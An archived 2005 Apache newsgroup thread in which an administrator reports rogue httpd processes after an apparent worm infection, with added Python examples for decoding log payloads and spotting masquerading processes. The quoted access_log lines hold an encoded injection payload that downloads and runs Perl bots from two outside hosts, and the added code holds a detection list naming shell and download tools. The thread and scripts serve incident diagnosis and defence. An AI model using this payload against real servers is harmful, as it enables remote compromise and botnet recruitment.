
strange apache processes

 
khorne_fr1




(Msg. 1) Posted: Thu Jan 20, 2005 6:35 am
Post subject: strange apache processes
Archived from groups: alt>apache>configuration

Hi,


I work with Apache on Mandrake 10.1 and I found that Apache launches strange
processes.

Normal processes under Mandrake look like this:

httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2 -DHAVE_PHP4 -DHAVE_ACCESS -DHAVE ...

But a few minutes after starting Apache, Apache launches processes like this:
/usr/local/apache/bin/httpd -DSSL
/usr/local/apache/bin/httpd - D55L
/usr/local/apache/bin/httpd - D5SL

These processes don't stop when I stop Apache, and I can't restart Apache
until I kill them.
And of course there are no httpd files under the /usr/local/apache/bin/ directory.

I think it's a virus or a worm.

Below are a few lines from access_log:

127.0.0.1 - - [20/Jan/2005:09:52:07 +0100] "GET
/your_server_is_infected_by_shanty.html?iID=188&rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.com/.notes/ssh2.htm%3bperl%2520ssh2.htm%3brm%2520ssh.htm%3bperl%2520bot.htm%3brm%2520bot.htm%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527'%3b
HTTP/1.1" 404 364 "-" "LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:09:52:12 +0100] "GET
/?t=13714&rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.com/.notes/ssh2.htm%3bperl%2520ssh2.htm%3brm%2520ssh.htm%3bperl%2520bot.htm%3brm%2520bot.htm%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527'%3b
HTTP/1.1" 200 6980 "-" "LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:09:54:12 +0100] "GET
/?t=6&rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.com/.notes/ssh2.htm%3bperl%2520ssh2.htm%3brm%2520ssh.htm%3bperl%2520bot.htm%3brm%2520bot.htm%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527'%3b
HTTP/1.1" 200 6980 "-" "LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:10:45:12 +0100] "GET / HTTP/1.1" 200 6980 "-"
"LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:10:45:13 +0100] "GET / HTTP/1.1" 200 6980 "-"
"LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:10:46:30 +0100] "GET / HTTP/1.1" 200 6980 "-"
"LWP::Simple/5.800"


Thanks for your help,


Khorne
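
The access_log entries in the post above hide their payload under several layers of percent-encoding. The following is an added example, not part of the original thread: it decodes a request target until it stops changing and reports what the decoded text contains. The sample lines are constructed to the same shape as the thread's log (example.invalid is a placeholder host), and the indicator patterns are assumptions to tune per site.

```python
import re
from urllib.parse import unquote

# Apache combined log: host ident user [time] "METHOD target PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

# Patterns checked on the fully decoded target. The list is an assumption; tune per site.
INDICATORS = {
    "php_exec_call": re.compile(r"\b(passthru|system|shell_exec|popen)\s*\(", re.I),
    "download_tool": re.compile(r"\b(wget|curl|lynx)\s", re.I),
    "shell_chain": re.compile(r";\s*(cd|mkdir|rm|perl|sh|chmod)\b", re.I),
}

# Constructed sample lines shaped like the thread's log; example.invalid is a placeholder host.
SAMPLE = [
    '127.0.0.1 - - [20/Jan/2005:09:54:12 +0100] "GET /?t=6&rush=%2565%2563%2568%256F'
    '%2520ok%3bcd%2520/tmp%3bwget%2520http://example.invalid/x%3bperl%2520x'
    '&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524v%2529.%252527'
    ' HTTP/1.1" 200 6980 "-" "LWP::Simple/5.800"',
    '127.0.0.1 - - [20/Jan/2005:10:45:12 +0100] "GET / HTTP/1.1" 200 6980 "-" "LWP::Simple/5.800"',
]

def decode_layers(value, max_rounds=5):
    """Percent-decode until the text stops changing; return (text, rounds needed)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def analyze(line):
    """Return a finding dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, method, target, status, agent = m.groups()
    decoded, rounds = decode_layers(target)
    hits = sorted(n for n, rx in INDICATORS.items() if rx.search(decoded))
    return {"host": host, "status": int(status), "agent": agent,
            "layers": rounds, "hits": hits, "decoded": decoded}

if __name__ == "__main__":
    for entry in map(analyze, SAMPLE):
        print(entry["status"], entry["layers"], entry["hits"], entry["decoded"])
```

Log lines that an archive has wrapped, as in this thread, must be rejoined onto one line before parsing. A flagged request that returned status 200 from host 127.0.0.1 with a Perl library user agent, as in the thread's log, points at traffic generated on the server itself.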

davideyeahsure




(Msg. 2) Posted: Thu Jan 20, 2005 8:35 am
Post subject: Re: strange apache processes

On 2005-01-20, Khorne <khorne_fr1.DeleteThis@hotmail.com> wrote:
 > But a few minutes after starting Apache, Apache launches processes like this
 > /usr/local/apache/bin/httpd -DSSL

What does ps -ef | grep httpd show?

 > And of course there are no httpd files under the /usr/local/apache/bin/ directory

Then it is trying to run a process that doesn't exist. I don't think that
Apache is the culprit.

 > Below are a few lines from access_log
 > 127.0.0.1 - - [20/Jan/2005:09:52:07 +0100] "GET
 > /your_server_is_infected_by_shanty.html?iID=188&rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.com/.notes/ssh2.htm%3bperl%2520ssh2.htm%3brm%2520ssh.htm%3bperl%2520bot.htm%3brm%2520bot.htm%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527'%3b

It looks like some kind of virus. Checked on google?

Davide

--
Bang on the LEFT side of your computer to restart Windows.
khorne_fr1




(Msg. 3) Posted: Thu Jan 20, 2005 9:35 am
Post subject: Re: strange apache processes

That's what ps -ef | grep httpd shows:

root 19995 1 0 13:15 ? 00:00:00 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20003 19995 0 13:15 ? 00:00:04 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20024 19995 0 13:15 ? 00:00:06 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20056 19995 0 13:15 ? 00:00:01 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20331 19995 0 13:36 ? 00:00:05 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20332 19995 0 13:36 ? 00:00:02 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20333 19995 0 13:36 ? 00:00:02 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20334 19995 0 13:36 ? 00:00:04 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20335 19995 0 13:36 ? 00:00:03 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20337 19995 0 13:36 ? 00:00:03 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20436 1 0 13:42 ? 00:00:05 /usr/local/apache/bin/httpd - D5SL
apache 20507 19995 0 13:54 ? 00:00:02 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20557 1 0 13:55 ? 00:00:03 /usr/local/apache/bin/httpd - D5SL
apache 20605 19995 0 13:55 ? 00:00:01 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20778 19995 0 14:12 ? 00:00:00 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20927 19995 0 14:25 ? 00:00:00 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
root 20931 20928 0 14:25 ? 00:00:00 sh -c (ps -ef | grep httpd) 2>&1
root 20932 20931 0 14:25 ? 00:00:00 sh -c (ps -ef | grep httpd) 2>&1
root 20934 20932 0 14:25 ? 00:00:00 grep httpd


I've been searching on Google for a worm or virus matching this, but I didn't
find anything.

Is there a quick solution to block these processes until I find a real
solution?
davideyeahsure




(Msg. 4) Posted: Thu Jan 20, 2005 11:35 am
Post subject: Re: strange apache processes

On 2005-01-20, Khorne <khorne_fr1.RemoveThis@hotmail.com> wrote:
 > That's what ps -ef | grep httpd shows:
 >
 > root 19995 1 0 13:15 ? 00:00:00 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
 > apache 20003 19995 0 13:15 ? 00:00:04 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...

 > apache 20436 1 0 13:42 ? 00:00:05 /usr/local/apache/bin/httpd - D5SL
 > apache 20557 1 0 13:55 ? 00:00:03 /usr/local/apache/bin/httpd - D5SL

Ok, the first one is the 'correct' apache, the second one
is evidently a bugged version or the clear indication that your
machine has been hacked.

 > Is there a quick solution to block these processes until I find a real
 > solution?

Yes, pull the plug on your machine, boot from a clean media, mount
the partition read-only.

Davide

--
Windows Tip of the Day:
Add DEVICE=FNGRCROS.SYS to your CONFIG.SYS file.
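
The two rows singled out in the reply above differ from the real workers in two ways: their parent is PID 1 rather than the root-owned master, and their command line names a path that is not the binary on disk. The following is an added example, not part of the original thread: it automates both checks over `ps -ef` output. The sample rows are copied from the thread's listing; the function names are hypothetical.

```python
import os

WEB_USER = "apache"            # account the workers run as in the thread
NAMES = ("httpd", "httpd2")    # binary names that appear in the thread's listing

# Rows copied from the ps -ef listing in the thread, rejoined onto one line each.
SAMPLE_PS = """\
root 19995 1 0 13:15 ? 00:00:00 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20003 19995 0 13:15 ? 00:00:04 httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2...
apache 20436 1 0 13:42 ? 00:00:05 /usr/local/apache/bin/httpd - D5SL
apache 20557 1 0 13:55 ? 00:00:03 /usr/local/apache/bin/httpd - D5SL
root 20934 20932 0 14:25 ? 00:00:00 grep httpd
"""

def parse_ps(text):
    """Parse `ps -ef` rows (UID PID PPID C STIME TTY TIME CMD) into dicts."""
    rows = []
    for line in text.splitlines():
        f = line.split(None, 7)
        if len(f) == 8 and f[1].isdigit() and f[2].isdigit():
            rows.append({"user": f[0], "pid": int(f[1]), "ppid": int(f[2]),
                         "cmd": f[7], "argv0": f[7].split()[0]})
    return rows

def orphan_workers(rows):
    """Web-user httpd processes whose parent is not a root-owned httpd master."""
    def is_httpd(r):
        return os.path.basename(r["argv0"]) in NAMES
    masters = {r["pid"] for r in rows if r["user"] == "root" and is_httpd(r)}
    return [r for r in rows
            if r["user"] == WEB_USER and is_httpd(r) and r["ppid"] not in masters]

def masquerading(row, readlink=os.readlink):
    """True if argv[0] is an absolute path other than the binary actually running."""
    if not os.path.isabs(row["argv0"]):
        return False                  # relative name: nothing to compare against
    try:
        real = readlink(f"/proc/{row['pid']}/exe")   # Linux: what the kernel executed
    except OSError:
        return None                   # process exited, or /proc entry not readable
    return real != row["argv0"]       # also true when the binary shows "(deleted)"

if __name__ == "__main__":
    for r in orphan_workers(parse_ps(SAMPLE_PS)):
        print(r["pid"], r["ppid"], r["cmd"], masquerading(r))
```

Where the legitimate binary is started through a symlink, resolve argv[0] with `os.path.realpath` before comparing, or the check will flag it.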